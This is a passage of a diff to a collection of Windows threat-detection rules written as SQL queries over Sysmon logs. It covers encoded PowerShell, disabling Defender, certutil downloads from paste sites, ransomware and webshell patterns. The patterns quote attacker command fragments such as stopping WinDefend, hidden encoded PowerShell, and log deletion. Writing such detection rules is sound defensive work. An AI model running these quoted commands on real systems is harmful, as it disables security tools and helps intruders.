"proc_creation_win_iis_appcmd_service_account_password_dumped.yml" + "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" }, { - "title": "Suspicious Encoded PowerShell Command Line", - "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", - "status": "test", - "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", + "title": "Disable Windows Defender AV Security Monitoring", + "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "status": "experimental", + "description": "Detects attackers attempting to disable Windows Defender using Powershell", + "author": "ok @securonix invrep-de, oscd.community, frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1562.001" + ], + "falsepositives": [ + "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\') OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\' AND CommandLine LIKE '% -w%' ESCAPE '\\' AND CommandLine LIKE '% hidden %' ESCAPE '\\')) OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% BA^J%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\') AND NOT (CommandLine LIKE '% -ExecutionPolicy%' ESCAPE '\\' AND CommandLine LIKE '%remotesigned %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" + "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" }, { - "title": "Potential Dtrack RAT Activity", - "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", - "status": "stable", - "description": "Detects potential Dtrack RAT activity via specific process patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Rundll32 JS RunHTMLApplication Pattern", + "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "status": "test", + "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_dtrack.yml" + "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" }, { - "title": "REvil Kaseya Incident Malware Patterns", - "id": "5de632bc-7fbd-4c8a-944a-fce55c59eae5", - "status": "test", - "description": "Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", + "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", + "status": "experimental", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059", - "attack.g0115" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%C:\\\\Windows\\\\cert.exe%' ESCAPE '\\' OR CommandLine LIKE '%del /q /f c:\\\\kworking\\\\agent.crt%' ESCAPE '\\' OR CommandLine LIKE '%Kaseya VSA Agent Hot-fix%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\MsMpEng.exe%' ESCAPE '\\' OR CommandLine LIKE '%rmdir /s /q \\%SystemDrive\\%\\\\inetpub\\\\logs%' ESCAPE '\\' OR CommandLine LIKE '%del /s /q /f \\%SystemDrive\\%\\\\%.log%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.exe%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.crt%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\MsMpEng.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\cert.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\kworking\\\\agent.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\kworking1\\\\agent.exe' ESCAPE '\\') OR (CommandLine LIKE '%del /s /q /f%' ESCAPE '\\' AND CommandLine LIKE '%WebPages\\\\Errors\\\\webErrorLog.txt%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_revil_kaseya.yml" + "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" }, { - "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", - "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", + "title": "Pingback Backdoor Activity", + "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", "status": "test", - "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", - "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" ], - "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" + "filename": "proc_creation_win_malware_pingback_backdoor.yml" }, { - "title": "Potential Raspberry Robin Dot Ending File", - "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", - "status": "experimental", - "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Trickbot Malware Reconnaissance Activity", + "id": "410ad193-a728-4107-bc79-4419789fcbf8", + "status": "test", + "description": "Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", + "author": "David Burkett, Florian Roth", "tags": [ - "attack.execution" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Unknown" + "Rare System Admin Activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND Image LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" + "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" }, { - "title": "Abusing IEExec To Download Payloads", - "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", - "status": "experimental", - "description": "Detects execution of the IEExec utility to download payloads", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_lolbin_ieexec_download.yml" - }, - { - "title": "Powershell Token Obfuscation - Process Creation", - "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", - "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", - "author": "frack113", + "title": "HackTool - DInjector PowerShell Cradle Execution", + "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", + "status": "test", + "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027.009" + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_token_obfuscation.yml" + "filename": "proc_creation_win_hktl_dinjector.yml" }, { - "title": "File Download with Headless Browser", - "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation", + "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", "status": "test", - "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", - "author": "Sreeman, Florian Roth", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - Process", - "id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "title": "Rundll32 Execution Without Parameters", + "id": "5bb68627-3198-40ca-b458-49f973db8752", "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", + "author": "Bartlomiej Czyz, Relativity", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "False positives may occur if a user called rundll32 from CLI with no options" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND Image LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine IN ('rundll32.exe', 'rundll32'))" ], - "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "proc_creation_win_rundll32_without_parameters.yml" }, { - "title": "Use NTFS Short Name in Image", - "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", - "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", + "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", + "status": "test", + "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%~1.exe%' ESCAPE '\\' OR Image LIKE '%~1.bat%' ESCAPE '\\' OR Image LIKE '%~1.msi%' ESCAPE '\\' OR Image LIKE '%~1.vbe%' ESCAPE '\\' OR Image LIKE '%~1.vbs%' ESCAPE '\\' OR Image LIKE '%~1.dll%' ESCAPE '\\' OR Image LIKE '%~1.ps1%' ESCAPE '\\' OR Image LIKE '%~1.js%' ESCAPE '\\' OR Image LIKE '%~1.hta%' ESCAPE '\\' OR Image LIKE '%~2.exe%' ESCAPE '\\' OR Image LIKE '%~2.bat%' ESCAPE '\\' OR Image LIKE '%~2.msi%' ESCAPE '\\' OR Image LIKE '%~2.vbe%' ESCAPE '\\' OR Image LIKE '%~2.vbs%' ESCAPE '\\' OR Image LIKE '%~2.dll%' ESCAPE '\\' OR Image LIKE '%~2.ps1%' ESCAPE '\\' OR Image LIKE '%~2.js%' ESCAPE '\\' OR Image LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentImage LIKE '%-installer.exe' ESCAPE '\\') OR Image LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE '%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" + "filename": "proc_creation_win_schtasks_reg_loader.yml" }, { - "title": "Chopper Webshell Process Pattern", - "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", - "status": "experimental", - "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", - "author": "Florian Roth (Nextron Systems), MSTI (query)", + "title": "Suspicious MSHTA Child Process", + "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", + "status": "test", + "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", + "author": "Michael Haag", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.defense_evasion", + "attack.t1218.005", + "car.2013-02-003", + "car.2013-03-001", + "car.2014-04-003" ], "falsepositives": [ - "Unknown" + "Printer software / driver installations", + "HP software" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" ], - "filename": "proc_creation_win_webshell_chopper.yml" + "filename": "proc_creation_win_mshta_susp_child_processes.yml" }, { - "title": "Tor Client/Browser Execution", - "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "title": "Winrar Execution in Non-Standard Folder", + "id": "4ede543c-e098-43d9-a28f-dd784a13132f", "status": "test", - "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", - "author": "frack113", + "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", + "author": "Florian Roth (Nextron Systems), Tigzy", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\tor.exe' ESCAPE '\\' OR Image LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND NOT ((Image LIKE '%\\\\WinRAR%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_browsers_tor_execution.yml" + "filename": "proc_creation_win_winrar_execution.yml" }, { - "title": "NodejsTools PressAnyKey Lolbin", - "id": "a20391f8-76fb-437b-abc0-dba2df1952c6", - "status": "test", - "description": "Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - Wmiexec Default Powershell Command", + "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", + "status": "experimental", + "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218" + "attack.lateral_movement" ], "falsepositives": [ - "Other tools with the same command line flag combination", - "Legitimate uses as part of Visual Studio development" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Microsoft.NodejsTools.PressAnyKey.exe normal %' ESCAPE '\\' OR (CommandLine LIKE '%.exe normal %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\Microsoft\\\\NodeJsTools\\\\NodeJsTools%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pressaynkey.yml" + "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" }, { - "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", - "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "title": "Suspicious Script Execution From Temp Folder", + "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", "status": "experimental", - "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious script executions from temporary folder", + "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim 